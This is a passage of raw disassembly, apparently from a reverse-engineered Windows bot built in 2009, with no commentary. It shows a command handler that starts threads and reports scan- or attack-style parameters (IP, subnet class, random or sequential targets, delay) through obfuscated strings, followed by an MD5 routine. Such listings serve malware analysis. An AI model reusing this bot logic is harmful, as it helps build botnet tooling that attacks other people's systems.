cmp [ebp+arg_4], 0
pop ecx
pop ecx
jle loc_414322
loc_4144E1: ; CODE XREF: sub_40A9FE+9B08�j
test eax, eax
jz loc_414322
mov byte ptr [eax], 78h
lea eax, [ebp+var_164]
push 30h
push eax
call sub_42B060
inc byte ptr [ebp+arg_C+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_C+3]
cmp ecx, [ebp+arg_4]
jl short loc_4144E1
jmp loc_414322
; ---------------------------------------------------------------------------
loc_41450D: ; CODE XREF: sub_40A9FE+9A96�j
and [ebp+var_A8], 0
loc_414514: ; CODE XREF: sub_40A9FE+992E�j
; sub_40A9FE+995D�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_B4], eax
mov eax, [ebp+arg_20]
mov [ebp+var_AC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_B0], eax
mov [ebp+var_9C], ecx
test eax, eax
lea eax, [ebp+var_154]
jz short loc_414549
push offset dword_443F14
jmp short loc_41454E
; ---------------------------------------------------------------------------
loc_414549: ; CODE XREF: sub_40A9FE+9B42�j
push offset dword_443F1C
loc_41454E: ; CODE XREF: sub_40A9FE+9B49�j
push eax
call dword_4370B4 ; lstrcpyA
cmp [ebp+var_A8], 0
mov eax, offset aRandom ; "Random"
jnz short loc_414568
mov eax, offset aSequential ; "Sequential"
loc_414568: ; CODE XREF: sub_40A9FE+9B63�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push 8
call sub_4234A7
add esp, 28h
mov [ebp+var_C8], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_164]
push eax
xor eax, eax
push eax
push ecx
push offset sub_402459
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_C8]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_414643
cmp [ebp+arg_14], eax
jnz short loc_414602
cmp [ebp+arg_18], eax
jnz short loc_414608
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_414602: ; CODE XREF: sub_40A9FE+9BDD�j
cmp [ebp+arg_18], 0
jz short loc_414627
loc_414608: ; CODE XREF: sub_40A9FE+9BE2�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 18h
loc_414627: ; CODE XREF: sub_40A9FE+98AE�j
; sub_40A9FE+98CB�j ...
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_8]
jl loc_414094
jmp loc_414995
; ---------------------------------------------------------------------------
loc_41463B: ; CODE XREF: sub_40A9FE+9C4C�j
push 32h
call dword_437190 ; Sleep
loc_414643: ; CODE XREF: sub_40A9FE+9BD8�j
cmp [ebp+var_A4], 0
jz short loc_41463B
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_4146AC
cmp [ebp+arg_18], eax
jnz short loc_4146B6
cmp [ebp+arg_1C], eax
jnz short loc_414627
cmp [ebp+var_A8], eax
mov eax, offset aRandom ; "Random"
jnz short loc_41466F
mov eax, offset aSequential ; "Sequential"
loc_41466F: ; CODE XREF: sub_40A9FE+9C6A�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 2Ch
loc_4146AC: ; CODE XREF: sub_40A9FE+9C53�j
cmp [ebp+arg_18], 0
jz loc_414627
loc_4146B6: ; CODE XREF: sub_40A9FE+9C58�j
cmp [ebp+var_A8], 0
mov eax, offset aRandom ; "Random"
jnz short loc_4146C9
mov eax, offset aSequential ; "Sequential"
loc_4146C9: ; CODE XREF: sub_40A9FE+9CC4�j
push [ebp+var_BC]
lea ecx, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset aSSSSDWithADe_0 ; "%s %s %s %s:%d with a delay of %d secon"...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 2Ch
jmp loc_414627
; ---------------------------------------------------------------------------
loc_41470A: ; CODE XREF: sub_40A9FE+9979�j
mov edi, offset aSNoIpSpecified ; "%s No IP specified."
jmp short loc_414716
; ---------------------------------------------------------------------------
loc_414711: ; CODE XREF: sub_40A9FE+99D2�j
mov edi, offset aSNoSubnetCla_0 ; "%s No subnet class specified"
loc_414716: ; CODE XREF: sub_40A9FE+9D11�j
cmp [ebp+arg_14], ecx
jnz short loc_414734
cmp [ebp+arg_18], ecx
jnz short loc_41473E
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_414734: ; CODE XREF: sub_40A9FE+9D1B�j
cmp [ebp+arg_18], 0
loc_414738: ; CODE XREF: sub_40A9FE+5FC5�j
jz loc_414995
loc_41473E: ; CODE XREF: sub_40A9FE+5FA6�j
; sub_40A9FE+9D20�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
loc_414743: ; CODE XREF: sub_40A9FE+C69�j
; sub_40A9FE+4658�j
push edi
loc_414744: ; CODE XREF: sub_40A9FE+2775�j
; sub_40A9FE+28CB�j ...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
loc_41474E: ; CODE XREF: sub_40A9FE+55B�j
; sub_40A9FE+5E3F�j
add esp, 10h
jmp loc_414995
; ---------------------------------------------------------------------------
loc_414756: ; CODE XREF: sub_40A9FE+5E71�j
; sub_40A9FE+5E7A�j ...
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
loc_41475B: ; CODE XREF: sub_40A9FE+927F�j
; sub_40A9FE+949F�j
cmp [ebp+arg_14], eax
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_414781
cmp [ebp+arg_18], eax
jnz short loc_41478A
push ebx
push edi
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
xor eax, eax
loc_414781: ; CODE XREF: sub_40A9FE+9D65�j
cmp [ebp+arg_18], eax
loc_414784: ; CODE XREF: sub_40A9FE+1540�j
jz loc_414995
loc_41478A: ; CODE XREF: sub_40A9FE:loc_40BF1F�j
; sub_40A9FE+9D6A�j
push ebx
push edi
loc_41478C: ; CODE XREF: sub_40A9FE+51F0�j
push offset aSS_1 ; "%s %s"
loc_414791: ; CODE XREF: sub_40A9FE+6FE�j
; sub_40A9FE+1E94�j ...
push dword ptr [esi]
loc_414793: ; CODE XREF: sub_40A9FE+466�j
; sub_40A9FE+1C0C�j
push [ebp+arg_10]
call sub_41CDD4
loc_41479B: ; CODE XREF: sub_40A9FE+158�j
; sub_40A9FE+280F�j ...
add esp, 14h
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4147A3: ; CODE XREF: sub_40A9FE+1D14�j
; sub_40A9FE+1D25�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437178
mov ebx, eax
push 3
neg ebx
sbb ebx, ebx
inc ebx
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_414806
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4147EE
cmp [ebp+arg_18], 0
jnz short loc_4147F8
push eax
push ebx
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4147EE: ; CODE XREF: sub_40A9FE+9DD2�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4147F8: ; CODE XREF: sub_40A9FE+9DD8�j
push [ebp+arg_C]
push ebx
push offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_414806: ; CODE XREF: sub_40A9FE+9DC2�j
mov eax, [ebp+arg_14]
mov [ebp+var_DA0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_DA4], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_E50]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
xor edi, edi
cmp ebx, edi
mov [ebp+var_E54], eax
mov [ebp+var_DC0], ebx
mov [ebp+var_DBC], edi
mov ecx, offset aSecure ; "Secure"
jnz short loc_41489A
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aJvatg1988z81 ; "jVATg1988z81"
loc_414852: ; CODE XREF: sub_40A9FE+9EA1�j
push ecx
push eax
push offset aSS_ ; "%s %s."
push 3
call sub_4234A7
add esp, 10h
mov [ebp+var_DD0], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_E54]
push edi
push eax
push offset sub_422009
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_DD0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz short loc_4148B6
jmp short loc_4148A9
; ---------------------------------------------------------------------------
loc_41489A: ; CODE XREF: sub_40A9FE+9E48�j
mov eax, offset aFfec81uznt81 ; "fFEC81UzNT81"
jmp short loc_414852
; ---------------------------------------------------------------------------
loc_4148A1: ; CODE XREF: sub_40A9FE+9EB1�j
push 32h
call dword_437190 ; Sleep
loc_4148A9: ; CODE XREF: sub_40A9FE+9E9A�j
cmp [ebp+var_D98], edi
jz short loc_4148A1
jmp loc_414995
; ---------------------------------------------------------------------------
loc_4148B6: ; CODE XREF: sub_40A9FE+9E98�j
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4148F7
cmp [ebp+arg_18], 0
jnz short loc_414901
test ebx, ebx
mov [ebp+arg_C], offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_4148D9
mov [ebp+arg_C], offset aJvatg1988z81 ; "jVATg1988z81"
loc_4148D9: ; CODE XREF: sub_40A9FE+9ED2�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push [ebp+arg_C]
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4148F7: ; CODE XREF: sub_40A9FE+9EC1�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_414901: ; CODE XREF: sub_40A9FE+9EC7�j
test ebx, ebx
mov ebx, offset aFfec81uznt81 ; "fFEC81UzNT81"
jnz short loc_41490F
mov ebx, offset aJvatg1988z81 ; "jVATg1988z81"
loc_41490F: ; CODE XREF: sub_40A9FE+17FA�j
; sub_40A9FE+1826�j ...
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
loc_41491B: ; CODE XREF: sub_40A9FE+95A�j
; sub_40A9FE+FA1�j
push ebx
loc_41491C: ; CODE XREF: sub_40A9FE+9A0�j
; sub_40A9FE+DD4�j ...
push edi
loc_41491D: ; CODE XREF: sub_40A9FE+D01�j
; sub_40A9FE+4BD3�j ...
push dword ptr [esi]
loc_41491F: ; CODE XREF: sub_40A9FE+A00�j
push [ebp+arg_10]
call sub_41CDD4
loc_414927: ; CODE XREF: sub_40A9FE+1508�j
add esp, 18h
jmp short loc_414995
; ---------------------------------------------------------------------------
loc_41492C: ; CODE XREF: sub_40A9FE+18AD�j
; sub_40A9FE+18BE�j
xor eax, eax
cmp [ebp+arg_18], eax
jnz short loc_414964
cmp [ebp+arg_20], eax
mov eax, offset aBuiltOct102009 ; " Built: Oct 10 2009 20:03:55"
jnz short loc_414942
mov eax, offset byte_454A54
loc_414942: ; CODE XREF: sub_40A9FE+9F3D�j
push eax
push offset a3c9 ; "]&3c9"
push offset dword_4439BC
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS ; "%s %s (%s) %s"
loc_414957: ; CODE XREF: sub_40A9FE+290F�j
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
jmp short loc_414992
; ---------------------------------------------------------------------------
loc_414964: ; CODE XREF: sub_40A9FE+9F33�j
cmp [ebp+arg_20], eax
mov eax, offset aBuiltOct102009 ; " Built: Oct 10 2009 20:03:55"
jnz short loc_414973
mov eax, offset byte_454A54
loc_414973: ; CODE XREF: sub_40A9FE+9F6E�j
push eax
push offset a3c9 ; "]&3c9"
push offset dword_4439BC
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS ; "%s %s (%s) %s"
loc_414988: ; CODE XREF: sub_40A9FE+91A�j
; sub_40A9FE+1884�j ...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
loc_414992: ; CODE XREF: sub_40A9FE+9F64�j
add esp, 1Ch
loc_414995: ; CODE XREF: sub_40A9FE+2B�j
; sub_40A9FE+3C�j ...
xor eax, eax
inc eax
loc_414998: ; CODE XREF: sub_40A9FE+1A9E�j
; sub_40A9FE+85F1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40A9FE endp
; =============== S U B R O U T I N E =======================================
sub_41499D proc near ; CODE XREF: sub_4155AA+23�p
push esi
mov esi, ecx
call sub_41557E
mov eax, esi
pop esi
retn
sub_41499D endp
; =============== S U B R O U T I N E =======================================
sub_4149A9 proc near ; CODE XREF: sub_4154D9+3�p
and dword ptr [ecx], 0
and dword ptr [ecx+4], 0
mov dword ptr [ecx+8], 67452301h
mov dword ptr [ecx+0Ch], 0EFCDAB89h
mov dword ptr [ecx+10h], 98BADCFEh
mov dword ptr [ecx+14h], 10325476h
retn
sub_4149A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149CD proc near ; CODE XREF: sub_41535A+45�p
; sub_41535A+64�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
mov eax, [ebp+arg_0]
xor edx, edx
push ebx
push esi
mov dh, [eax+3]
push edi
mov dl, [eax+2]
movzx esi, byte ptr [eax+1]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+5]
mov [ebp+var_40], edx
xor edx, edx
mov dh, [eax+7]
mov dl, [eax+6]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+4]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+9]
mov [ebp+var_3C], edx
xor edx, edx
mov dh, [eax+0Bh]
mov dl, [eax+0Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+8]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Dh]
mov [ebp+var_38], edx
xor edx, edx
mov dh, [eax+0Fh]
mov dl, [eax+0Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+0Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+11h]
mov [ebp+var_34], edx
xor edx, edx
mov dh, [eax+13h]
mov dl, [eax+12h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+10h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+15h]
mov [ebp+var_30], edx
xor edx, edx
mov dh, [eax+17h]
mov dl, [eax+16h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+14h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+19h]
mov [ebp+var_2C], edx
xor edx, edx
mov dh, [eax+1Bh]
mov dl, [eax+1Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+18h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+1Dh]
mov [ebp+var_28], edx
xor edx, edx
mov dh, [eax+1Fh]
mov dl, [eax+1Eh]
shl edx, 8
or edx, esi
shl edx, 8
movzx esi, byte ptr [eax+1Ch]
or edx, esi
movzx esi, byte ptr [eax+21h]
mov [ebp+var_24], edx
xor edx, edx
mov dh, [eax+23h]
mov dl, [eax+22h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+20h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+25h]
mov [ebp+var_20], edx
xor edx, edx
mov dh, [eax+27h]
mov dl, [eax+26h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+24h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+29h]
mov [ebp+var_1C], edx
xor edx, edx
mov dh, [eax+2Bh]
mov dl, [eax+2Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+28h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Dh]
mov [ebp+var_18], edx
xor edx, edx
mov dh, [eax+2Fh]
mov dl, [eax+2Eh]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+2Ch]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+31h]
mov [ebp+var_14], edx
xor edx, edx
mov dh, [eax+33h]
mov dl, [eax+32h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+30h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+35h]
mov [ebp+var_10], edx
xor edx, edx
mov dh, [eax+37h]
mov dl, [eax+36h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+34h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+39h]
mov [ebp+var_C], edx
xor edx, edx
mov dh, [eax+3Bh]
mov dl, [eax+3Ah]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+38h]
shl edx, 8
or edx, esi
movzx esi, byte ptr [eax+3Dh]
mov [ebp+var_8], edx
xor edx, edx
mov dh, [eax+3Fh]
mov dl, [eax+3Eh]
movzx eax, byte ptr [eax+3Ch]
shl edx, 8
or edx, esi
shl edx, 8
mov esi, [ecx+14h]
mov edi, [ecx+10h]
mov ebx, [ecx+0Ch]
or edx, eax
mov eax, [ecx+8]
mov [ebp+var_4], edx
mov edx, esi
xor edx, edi
and edx, ebx
xor edx, esi
add edx, eax
mov eax, [ebp+var_40]
lea edx, [edx+eax-28955B88h]
mov eax, edx
shr eax, 19h
shl edx, 7
or eax, edx
mov edx, edi
add eax, ebx
xor edx, ebx
and edx, eax
xor edx, edi
add edx, [ebp+var_3C]
lea esi, [esi+edx-173848AAh]
mov edx, esi
shr edx, 14h
shl esi, 0Ch
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
and esi, edx
xor esi, ebx
mov ebx, edx
add esi, [ebp+var_38]
xor ebx, eax
lea edi, [edi+esi+242070DBh]
mov esi, edi
shr esi, 0Fh
shl edi, 11h
or esi, edi
mov edi, [ecx+0Ch]
add esi, edx
and ebx, esi
xor ebx, eax
add ebx, [ebp+var_34]
lea edi, [edi+ebx-3E423112h]
mov ebx, edi
shl ebx, 16h
shr edi, 0Ah
or ebx, edi
mov edi, edx
add ebx, esi
xor edi, esi
and edi, ebx
mov [ebp+arg_0], ebx
xor edi, edx
add edi, [ebp+var_30]
lea eax, [eax+edi-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, esi
add edi, ebx
xor eax, ebx
and eax, edi
xor eax, esi
add eax, [ebp+var_2C]
lea edx, [edx+eax+4787C62Ah]
mov eax, edx
shr eax, 14h
shl edx, 0Ch
or eax, edx
mov edx, ebx
add eax, edi
xor edx, edi
and edx, eax
xor edx, ebx
add edx, [ebp+var_28]
lea esi, [esi+edx-57CFB9EDh]
mov edx, esi
shr edx, 0Fh
shl esi, 11h
or edx, esi
mov esi, eax
add edx, eax
xor esi, edi
and esi, edx
xor esi, edi
add esi, [ebp+var_24]
lea esi, [ebx+esi-2B96AFFh]
mov ebx, esi
shl ebx, 16h
shr esi, 0Ah
or ebx, esi
mov esi, eax
xor esi, edx
add ebx, edx
and esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
add esi, [ebp+var_20]
lea edi, [edi+esi+698098D8h]
mov esi, edi
shr esi, 19h
shl edi, 7
or esi, edi
mov edi, edx
add esi, ebx
xor edi, ebx
and edi, esi
xor edi, edx
add edi, [ebp+var_1C]
lea eax, [eax+edi-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
mov eax, ebx
add edi, esi
xor eax, esi
and eax, edi
xor eax, ebx
add eax, [ebp+var_18]
lea edx, [edx+eax-0A44Fh]
mov eax, edx
shr eax, 0Fh
shl edx, 11h
or eax, edx
mov edx, edi
add eax, edi
xor edx, esi
and edx, eax
xor edx, esi
add edx, [ebp+var_14]
lea edx, [ebx+edx-76A32842h]
mov ebx, edx
shl ebx, 16h
shr edx, 0Ah
or ebx, edx
mov edx, edi
add ebx, eax
xor edx, eax
and edx, ebx
mov [ebp+arg_0], ebx
xor edx, edi
add edx, [ebp+var_10]
lea esi, [esi+edx+6B901122h]
mov edx, esi
shr edx, 19h
shl esi, 7
or edx, esi
mov esi, eax
add edx, ebx
xor esi, ebx
and esi, edx
xor esi, eax
add esi, [ebp+var_C]
lea edi, [edi+esi-2678E6Dh]
mov ebx, edi
shr ebx, 14h
shl edi, 0Ch
or ebx, edi
mov edi, [ebp+arg_0]
mov esi, edi
add ebx, edx
xor esi, edx
and esi, ebx
xor esi, edi
add esi, [ebp+var_8]
lea eax, [eax+esi-5986BC72h]
mov esi, eax
shr esi, 0Fh
shl eax, 11h
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, edx
and eax, esi
xor eax, edx
add eax, [ebp+var_4]
lea edi, [edi+eax+49B40821h]
mov eax, edi
shl eax, 16h
shr edi, 0Ah
or eax, edi
mov edi, esi
add eax, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_3C]
lea edx, [edx+edi-9E1DA9Eh]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_28]
lea ebx, [ebx+edx-3FBF4CC0h]
mov edx, ebx
shr edx, 17h
shl ebx, 9
or edx, ebx
add edx, edi
mov ebx, edx
xor ebx, edi
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_14]
lea esi, [esi+ebx+265E5A51h]
mov ebx, esi
shr ebx, 12h
shl esi, 0Eh
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_40]
lea eax, [eax+esi-16493856h]
mov esi, eax
shl esi, 14h
shr eax, 0Ch
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_2C]
lea edi, [edi+eax-29D0EFA3h]
mov eax, edi
shr eax, 1Bh
shl edi, 5
or eax, edi
add eax, esi
mov edi, esi
xor edi, eax
and edi, ebx
xor edi, esi
add edi, [ebp+var_18]
lea edx, [edx+edi+2441453h]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
add edi, eax
mov edx, edi
xor edx, eax
and edx, esi
xor edx, eax
add edx, [ebp+var_4]
lea ebx, [ebx+edx-275E197Fh]
mov edx, ebx
shr edx, 12h
shl ebx, 0Eh
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_30]
lea esi, [esi+ebx-182C0438h]
mov ebx, esi
shl ebx, 14h
shr esi, 0Ch
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_1C]
lea eax, [eax+esi+21E1CDE6h]
mov esi, eax
shr esi, 1Bh
shl eax, 5
or esi, eax
mov eax, ebx
add esi, ebx
xor eax, esi
and eax, edx
xor eax, ebx
add eax, [ebp+var_8]
lea edi, [edi+eax-3CC8F82Ah]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, esi
mov edi, eax
xor edi, esi
and edi, ebx
xor edi, esi
add edi, [ebp+var_34]
lea edx, [edx+edi-0B2AF279h]
mov edi, edx
shr edi, 12h
shl edx, 0Eh
or edi, edx
mov edx, eax
add edi, eax
xor edx, edi
and edx, esi
xor edx, eax
add edx, [ebp+var_20]
lea ebx, [ebx+edx+455A14EDh]
mov edx, ebx
shl edx, 14h
shr ebx, 0Ch
or edx, ebx
mov ebx, edi
add edx, edi
xor ebx, edx
and ebx, eax
xor ebx, edi
add ebx, [ebp+var_C]
lea esi, [esi+ebx-561C16FBh]
mov ebx, esi
shr ebx, 1Bh
shl esi, 5
or ebx, esi
mov esi, edx
add ebx, edx
xor esi, ebx
and esi, edi
xor esi, edx
add esi, [ebp+var_38]
lea eax, [eax+esi-3105C08h]
mov esi, eax
shr esi, 17h
shl eax, 9
or esi, eax
add esi, ebx
mov eax, esi
mov [ebp+arg_0], esi
xor eax, ebx
and eax, edx
xor eax, ebx
add eax, [ebp+var_24]
lea eax, [edi+eax+676F02D9h]
mov edi, eax
shr edi, 12h
shl eax, 0Eh
or edi, eax
add edi, esi
xor [ebp+arg_0], edi
mov eax, [ebp+arg_0]
and eax, ebx
xor eax, esi
add eax, [ebp+var_10]
lea edx, [edx+eax-72D5B376h]
mov eax, edx
shl eax, 14h
shr edx, 0Ch
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea ebx, [ebx+edx-5C6BEh]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
add edx, eax
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_20]
lea esi, [esi+ebx-788E097Fh]
mov ebx, esi
shr ebx, 15h
shl esi, 0Bh
or ebx, esi
add ebx, edx
mov esi, ebx
mov [ebp+arg_0], ebx
xor esi, eax
xor esi, edx
add esi, [ebp+var_14]
lea edi, [edi+esi+6D9D6122h]
mov esi, edi
shr esi, 10h
shl edi, 10h
or esi, edi
add esi, ebx
xor [ebp+arg_0], esi
mov edi, [ebp+arg_0]
xor edi, edx
add edi, [ebp+var_8]
lea edi, [eax+edi-21AC7F4h]
mov eax, edi
shl eax, 17h
shr edi, 9
or eax, edi
add eax, esi
mov edi, [ebp+arg_0]
xor edi, eax
add edi, [ebp+var_3C]
lea edi, [edx+edi-5B4115BCh]
mov edx, edi
shr edx, 1Ch
shl edi, 4
or edx, edi
mov edi, esi
add edx, eax
xor edi, eax
xor edi, edx
add edi, [ebp+var_30]
lea ebx, [ebx+edi+4BDECFA9h]
mov edi, ebx
shr edi, 15h
shl ebx, 0Bh
or edi, ebx
add edi, edx
mov ebx, edi
mov [ebp+arg_0], edi
xor ebx, eax
xor ebx, edx
add ebx, [ebp+var_24]
lea esi, [esi+ebx-944B4A0h]
mov ebx, esi
shr ebx, 10h
shl esi, 10h
or ebx, esi
add ebx, edi
xor [ebp+arg_0], ebx
mov esi, [ebp+arg_0]
xor esi, edx
add esi, [ebp+var_18]
lea esi, [eax+esi-41404390h]
mov eax, esi
shl eax, 17h
shr esi, 9
or eax, esi
mov esi, [ebp+arg_0]
add eax, ebx
xor esi, eax
add esi, [ebp+var_C]
lea esi, [edx+esi+289B7EC6h]
mov edx, esi
shr edx, 1Ch
shl esi, 4
or edx, esi
mov esi, ebx
add edx, eax
xor esi, eax
xor esi, edx
add esi, [ebp+var_40]
lea edi, [edi+esi-155ED806h]
mov esi, edi
shr esi, 15h
shl edi, 0Bh
or esi, edi
add esi, edx
mov edi, esi
mov [ebp+arg_0], esi
xor edi, eax
xor edi, edx
add edi, [ebp+var_34]
lea ebx, [ebx+edi-2B10CF7Bh]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, esi
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, edx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx+4881D05h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [edx+ebx-262B2FC7h]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
